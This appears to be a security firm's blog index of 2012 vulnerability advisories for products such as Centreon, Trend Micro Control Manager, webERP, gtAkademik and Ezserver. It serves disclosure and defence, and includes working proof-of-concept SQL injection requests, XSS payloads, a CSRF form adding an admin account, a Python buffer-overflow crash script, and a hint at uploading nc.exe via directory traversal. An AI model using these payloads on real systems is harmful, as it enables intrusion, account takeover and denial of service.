Blog
We are blogging to write our ‘security journal’ about what we’ve ever done such as security research, vulnerability discovery, proof of concept of a wild exploit and also an exploit development process.
This blog is provided for informational and educational purposes only; we shall not be responsible or liable for the accuracy or availability of any information appearing or available on this blog. Please refer to our Term of Use for more info.
Centreon Enterprise Server 2.3.3 – 2.3.9-4 Blind SQL Injection
We discovered the vulnerability when we’re looking for alternate software in network monitoring. We know and we love Nagios, and so the Centreon, they provide a very nice interface of Nagios. Centreon provide nice features and ease of use when you’re dealing with network monitoring. The backend system is still Nagios, but the interface is totally different. You can view more features of Centreon here.
Fully Automated Nagios (FAN) also uses Centreon, thus the vulnerability also affects FAN as well.
(more…)
PC Media Antivirus Insecure Library Loading Vulnerability
PC Media Antivirus (PCMAV) is an antivirus made in Indonesia. PCMAV is quite popular in 2006 since many virus creators in Indonesia actively spread a computer virus, and infecting most computers in Indonesia. At that time some people start to claim a special anti-virus to detect Indonesia computer viruses, some of which are popular such as SmadAV, PC Media Antivirus (PCMAV), and Ansav.
Until now, PCMAV is still a popular antivirus used on most computers in Indonesia. PCMAV usually installed alongside with another popular free antivirus such as Avast, AVG, or Avira Antivir. In some companies, PCMAV is also a mainstay for detecting viruses made in Indonesia.
Antivirus is an endpoint protection to detect malicious programs from outside the computer, so the antivirus should be made with good protection, well flow design, and it should not vulnerable, thus cannot be exploited.
(more…)
SmadAV 9.1 Null Pointer Dereference Vulnerability
SmadAV antivirus 9.1 is susceptible to null pointer exploitation. The application does not properly filter the scanner input that processed into smadengine.dll. The successful exploitation of this vulnerability could potentially result a crash on the application, since it will refer to a null pointer, EAX = 0000000.
The vulnerable function itself lay on the smadengine.dll file.
SmadEngine.dll
.text:100051B2 mov [ebp+var_414], ebx
.text:100051B8 cmp word ptr [ebp+var_3DC], 0
.text:100051C0 jbe loc_1000530D
.text:100051C6 call sub_100060C0
.text:100051CB push 4 ; ucb
.text:100051CD lea ecx, [ebp+var_3C8]
.text:100051D3 push ecx ; lp
.text:100051D4 call ds:IsBadReadPtr
.text:100051DA cmp eax, 1
.text:100051DD jz loc_1000530D
.text:100051E3 mov esi, [ebp+var_3C8]
.text:100051E9 mov eax, [esi+0Ch]
.text:100051EC cmp [ebp+var_404], eax
.text:100051F2 jb short loc_100051FF
.text:100051F4 mov ecx, eax
.text:100051F6 sub ecx, [esi+14h]
.text:100051F9 mov [ebp+var_3E8], ecx
Call by
.text:10005574 inc ebx
.text:10005575 add esi, 28h
.text:10005578 mov [ebp+var_3C8], esi
.text:1000557E add [ebp+var_3DC], 0FFFFh
.text:10005588 jmp loc_100051B2
Impact
The application will be crash and forced to close. It is possible to an attacker to make a virus/malware that have a function to crash the antivirus and when the application forced to closed, it will infect the system.
Solution
No solution from vendor.
Credit
Mada R. Perdhana for vulnerability research, proof of concept script and testing on various Windows version.
References
http://www.exploit-db.com/exploits/22653
http://www.spentera.com/advisories/2012/SPN-09-2012.html
Trend Micro Control Manager SQL Injection Vulnerability
Overview
SQL injection vulnerability was found in Trend Micro Control Manager. A remote attacker can extract sensitive data such as password through blind SQL injection.
Vulnerability Description
Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese version) and version 6 build 1449 (English version only) are susceptible to SQL Injection. The application does not properly filter user-supplied input. The successful exploitation of this vulnerability could potentially result in arbitrary SQL command input to the back-end database, such as execute SQL command to upload and execute arbitrary code against the target system.
The vulnerable parameter is ‘id’ parameter in the GET request for AdHocQuery_Processor.aspx page. According to Trend Micro Control Manager help page, an Ad Hoc Query is a direct request to the Control Manager database for information. The query uses data views to narrow the request and improve performance. After specifying the data view, users can further narrow their search by specifying filtering criteria for the request.
Version Affected
Trend Micro Control Manager 5.5 prior to 5.5.0.1823 (English and Japanese version)
Trend Micro Control Manager 6 prior to 6.0.0.1449 (English version)
Impact
An attacker with access to the Trend Micro Control Manager web interface can conduct a SQL injection attack, which could be used to result in information leakage, arbitrary code execution and/or denial of service.
Solution
The vendor has stated that these vulnerabilities have been addressed in Trend Micro Control Manager version 5.5 and 6.0 critical patches.
Critical patch available for SQL injection attacks in Control Manager (TMCM)
http://esupport.trendmicro.com/solution/en-us/1061043.aspx
Control Manager 6 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4202 – fragment-4248
Control Manager 5.5 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=1763 – fragment-1845
Trend Micro Control Manager 5.5 – Patch (Japanese only)
http://downloadcenter.trendmicro.com/index.php?regs=jp&clk=tbl&clkval=3432 – fragment-3462
Proof of Concept
http://www.spentera.com/advisories/2012/trendmicro_timebased_sqli.py.txt
References
JVN#42014489 – http://jvn.jp/en/jp/JVN42014489/index.html
VU#950795 – http://www.kb.cert.org/vuls/id/950795
Credit
Tom Gregory for the vulnerability research.
Hanny Haliwela for the proof of concept.
Mada R. Perdhana for reporting to JPCERT/CC
webERP <=4.08.4 SQL Injection Vulnerability
Overview
webERP <=4.08.4 contains sql injection vulnerability that may allow authenticated users to execute sql queries, potentially viewing or modifying data.
Vulnerability Description
webERP is a mature open-source ERP system providing best practise, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an sql query.
Proof of Concept
Time-based Blind SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&StartDate=14%2F09%2F2012&RequiredBy=14%2F09%2F2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=
Error-based SQL Injection
POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33'&StockLocation=MEL&StartDate=14%2F09%2F2012&RequiredBy=14%2F09%2F2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=
Solution
Upgrade to latest version here: http://sourceforge.net/projects/web-erp/
References
http://www.weberp.org/
http://www.spentera.com/advisories/2012/SPN-06-2012.html
Credit
Tom Gregory from Spentera Research.
Trend Micro InterScan Messaging Security Suite Multiple Vulnerabilities
Overview
Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.
Software Description
TrendMicro Interscan Messaging Security is the industry’s most comprehensive mail gateway security. Choose state-of-the-art software or a hybrid solution with on-premise virtual appliance and optional cloud pre-filter that blocks the vast majority of spam and malware outside your network. Plus our Data Privacy and Encryption Module secure outbound data to ensure privacy and regulatory compliance.
Vulnerability Overview
The vulnerabilities POC are as follow:
Cross-site Scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss”><script>alert(‘XSS’)</script>
Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src=“><script>alert(‘XSS’)</script>
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<html>
<body>
<form action=”hxxps://127.0.0.1:8445/saveAccountSubTab.imss” method=”POST”>
<input type=”hidden” name=”enabled” value=”on” />
<input type=”hidden” name=”authMethod” value=”1″ />
<input type=”hidden” name=”name” value=”quorra” />
<input type=”hidden” name=”password” value=”quorra.123″ />
<input type=”hidden” name=”confirmPwd” value=”quorra.123″ />
<input type=”hidden” name=”tabAction” value=”saveAuth” />
<input type=”hidden” name=”gotoTab” value=”saveAll” />
<input type=”submit” value=”CSRF” />
</form>
</body>
</html>
Solution
Currently, we are not aware of any vendor solution. You may contact the vendor for patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized user make use of this vulnerability.
References
http://www.spentera.com/advisories/2012/SPN-05-2012.html
http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html
Credit
Tom Gregory from Spentera Research.
gtAkademik Gamatechno SQL Injection and Persistent XSS
Overview
gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).
Vulnerability Details and POC
Stored/Persistent XSS
The web application allows an attacker to inject the XSS script inside the database (stored), because there is no such sanitation process. There is 2 modules suffer with XSS: Message Module and Update Profile Module.
Persistent XSS in Message Module
Message module is a module for internal messaging inside the gtAkademik, we can send an XSS crafted message to others for example we can send it to administrator user.
POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMessageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&act=doCompose&compBtn=Kirim
Persistent XSS in User Profile Module (save the user profile)
It’s a module to update the profile, we can inject an XSS into the profile and it save the data to database, so everyone who try to view the profile, vulnerable to XSS attack.
POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan
SQL Injection
The web application also susceptible to SQL injection vulnerability, because there is no such sensitization process, this allow an attacker to extract contents of database, and find a lot of important data, for example credentials that stored inside the database.
The parameter ‘id’ is vulnerable to SQL Injection.
http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1
Impact
Malicious authenticated users can exploit this vulnerability to execute arbitrary script in the context of a logged in user’s session. Further attack, malicious authenticated users may use sql injection vulnerability to execute arbitrary sql queries, potentially viewing or modifying data on the backend database.
Solution
Currently we are not aware if any updates or patch available from the vendor.
References
http://www.spentera.com/advisories/2012/SPN-01-2012.html
Credit
Hanny Haliwela and Mada Perdhana from Spentera Research.
Ezhometech Ezserver <=6.4.017 Stack Overflow Vulnerability
EZserver version 6.4.017 or below contains a buffer overflow vulnerability which may possibly be exploited to cause a denial of service or arbitrary code execution.
Software Description
EZserver is a Video Server that stream Full HD to various devices.
Developer Website
http://www.ezhometech.com/ezserver.htm
Vulnerability Details
Buffer overflow condition exist in URL handling, sending long GET request to the server on port 8000
will cause server process to exit and may allow malicious code injection.
Further research found that the application does not care about the HTTP method,
so that by sending long characters to the port 8000 will make the program crash.
Vendor logs
06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.
Proof of Concept
#!/usr/bin/python
from socket import *
import sys
if len(sys.argv) != 3:
print "[*] Proof of Concept of Ezserver <=6.4.017 Buffer Overflow"
print "[*] by Spentera Research - research[at]spentera[dot]com"
print "[*] http://www.spentera.com/resources/security-advisory\n"
print "[*] Usage: python %s ip port" %sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
junk = "\x41" * 10000
payload = junk
print "[!] Connecting to %s on port %d" % (host,port)
s = socket(AF_INET, SOCK_STREAM)
try:
s.connect((host,port))
print "[+] Launching attack.."
s.send ("GET /" + payload + "HTTP/1.0\r\n\r\n\r\n")
s.close()
except:
print "[x] Could not connect to the server x_x"
sys.exit()
References
Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http
Hexamail Server <= 4.4.5 Persistent XSS Vulnerability
Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.
Software Description
Hexamail provides intelligent email software solutions. Leveraging the latest advanced techniques, such as Bayesian matching, our products enable customers to eliminate email intrusions such as spam, malware, spyware, phishing attacks and virus.
Vulnerability Description
Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or hijack the user’s browser.
Proof of concept
By sending a malicious script to the victim email, the webmail automatically load the mail body, so the script will be automatically executed without permission from user.
root@bt:~/# cat > meal.txt
<html>
<body>
<h1> XSS pop up</h1>
<script>alert('Hi, what is this?');</script>
</body>
</html>
root@bt:~/#
Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com
Vendor timeline
04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor respond and provides new upgrade version
04/30/2012 – Issue still affected on the latest upgrade version
04/30/2012 – Vendor said they still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.
Solution
Not available.
References
http://www.hexamail.com
http://www.spentera.com/advisories/2012/SPN-02-2012.html
Distinct TFTP Server <=3.10 Directory Traversal Vulnerability
Overview
Distinct TFTP Server is part of Distinct Intranet Servers made by Distinct. Corp. Distinct TFTP Server version 3.10 is susceptible to directory traversal attack. Attacker can exploit this vulnerability to retrieve or upload files outside of the TFTP server root directory.
Software Description
From Distinct website:
Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.
Vulnerability Details and Attack Vector
The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash (‘../’) sequences, which allows attackers to read or write arbitrary files.
By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\). (more…)